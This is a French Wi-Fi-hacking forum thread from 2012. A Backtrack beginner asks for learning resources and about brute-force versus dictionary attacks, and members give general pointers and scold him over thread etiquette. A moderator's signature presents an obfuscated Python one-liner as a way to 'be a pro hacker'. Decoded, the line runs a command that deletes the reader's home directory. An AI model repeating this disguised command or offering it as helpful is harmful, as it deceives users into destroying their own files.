Crack-wifi.com FORUM

LE FORUM DU SITE

Wifi, Backtrack, crack WEP et WPA...

Vous n'êtes pas identifié(e).  

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#1 02-07-2012 22:41:22

arcare
Membre Actif

besoin d'aides pour des questions claires

Bonjour à tous !

Si je viens solliciter votre aide aujourd'hui c'est que je suis un peu perdu, mais ma question est simple wink

Je débute tout juste sous backtrack (et depuis quelques moi sous linux) je suis à font dedans !! un grand malade! tous les soirs je lis des articles, des tutos, forum enfin bref tout ce que je peux me mettre sous la dent, j'ai qu'une envie apprendre, apprendre et surtout COMPRENDRE !

Le seul problèmes, c'est qu’actuellement je sais plus vers ou me diriger, ce qui est de mon niveau et ce qui ne l'est pas, ce qui est vrai de ce qui ne l'est pas.

je ne vous demande pas des solutions mais des conseils !

Par ou je dois commencer ? comment je peux comprendre backtrack, avez vous des liens utiles ?

Le brute force, je comprend, mais parrait-il qu'il n'est pas réalisable car trop long ? vrai ou faux ?

Donc voila, j'attend vos petits conseil, vos pistes, car la je rame.

merci d'avance a tous ceux qui qui pourront ou voudront me guider dans ma quete :p

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#2 03-07-2012 08:28:30

M!C
Membre Actif

Re : besoin d'aides pour des questions claires

backtrack est basé sur ubuntu donc ... http://www.siteduzero.com/ et http://doc.ubuntu-fr.org/ te seront utile si tu veux apprendre, et pour le brute force vi C plus long que les dicos mais C plus efficace.

#3 03-07-2012 09:17:02

spawn
Modérateur

Le brute force c'est le mal.

@9b0ae3c4 méric.fr
be a pro hacker : python -c "exec ''.join([chr(ord(i)^0x46) for i in '/+6)42f)5}f)5h5?52#+nd4+fk4 f8ido'])"

#4 03-07-2012 19:26:59

arcare
Membre Actif

re smile merci de vos réponses. ubuntu je connais déja, j'irai meme plus loin j'apprécie.

ps: besoin d'une ptite explication, je croyais que brute force et dico c'était la meme chose ?

mon probleme, c'est que je découvre tous les jours pleins de chose (surtout sur ce site génial) mais j'ai l'impression qu'il faut quand meme pas mal de connaissances, et je sais pas ou les trouver.

#5 03-07-2012 19:38:24

arcare
Membre Actif

ok j'ai compris la différence pour l'histoire du brute force wink suffisait de savoir que c'était pas pareil

#6 03-07-2012 21:19:49

kcdtv
Membre d'honneur
Lieu : Internacionaluña

arcare a écrit :

(...)1
Le seul problèmes, c'est qu’actuellement je sais plus vers ou me diriger, ce qui est de mon niveau et ce qui ne l'est pas, ce qui est vrai de ce qui ne l'est pas.

(...)
2
Par ou je dois commencer ? comment je peux comprendre backtrack, avez vous des liens utiles ?
3
Le brute force, je comprend, mais parrait-il qu'il n'est pas réalisable car trop long ? vrai ou faux ?

1 - Lis les sujets épinglés de ce forum et la wiki aircrack-ng

2 - Nous avons une section dédiée entière à backtrack...

3 - Nous avons une section entière dédiée aux dictionnaires , on y évoque en large et en travers la "faisabilité" de telle entreprise; on y partage nos petits (et moins petits) fichiers.

PS: Fais un effort sur tes titres, si ta question est précise, pourquoi ne la pause tu pas au lieu de mettre un titre comme celui-ci ( en rien descriptif ) roll
Règles

#7 03-07-2012 22:16:31

arcare
Membre Actif

merci pour les réponses, je vais essayer de chercher un peu mieu mais dans tout ca on se perd vite.

pour répondre a ton ps, je voulais juste exprimer l'idée que je me pointe pas en disans "je suis perdu" je fais juste une demande de lien utiles, de conseils. afin de savoir ce vers quoi je peux me diriger, et ce qui est un peu plus complexe pour moi actuelement.

Merci de vos réponses !

#8 04-07-2012 02:25:35

kcdtv
Membre d'honneur

Pas de soucis.  wink
Mettre un titre descriptif permet principalement de rendre un thread accessible.
Je crains fort qu'ainsi personne n'ira le consulter dans un futur très proche. hmm
Attaque par brute force
Attaque par dictionnaire

#9 05-07-2012 11:37:02

arcare
Membre Actif

je prend en note ! merci bien, je vais peaufiner tout ca

#10 10-10-2012 17:36:43

arcare
Membre Actif

Salut salut !

Bon premiere difficulté qui arrive. j'ai DL métasploitable pour le virtualiser, sauf qu'il n'est pas compatible avec virtualbox. j'ai essayé quelques tutos qui sont sur le net, mais je n'y arrive pas hmm quelqu'un aurait-il une solution ou un bon site svp ?

#11 10-10-2012 18:47:47

kcdtv
Membre d'honneur

Tu n'as manifestement pas lu ou pris en copmpte nos règles.
un sujet = un topic.
Tu aurais pu modifier ton titre aussi au passage... roll
Bref là tu repars sur un autre thème dans un topic qui déjè en soi n'est pas conforme avec notre fonctionnement.
N'en rajoutes pas une couche... wink

Annonce

Pied de page des forums

Le coin des bonnes affaires, achats informatiques:

|   Alfa 1000 mW AWUS036H   |    Linksys WRT54GL   |    Misco, informatique   |   
 |    Ebay   |    PC portables   |    PC Gamers & Tuning   |    Cles USB   |   
|   Disques durs externes 2 To   |   
|   Wifi-highpower.com   |   

Server Stats - [ Generated in 0.029 seconds ]   Forum Stat - [ Most users ever online on the forum was : 150 on 20-09-2009 17:06:59 ]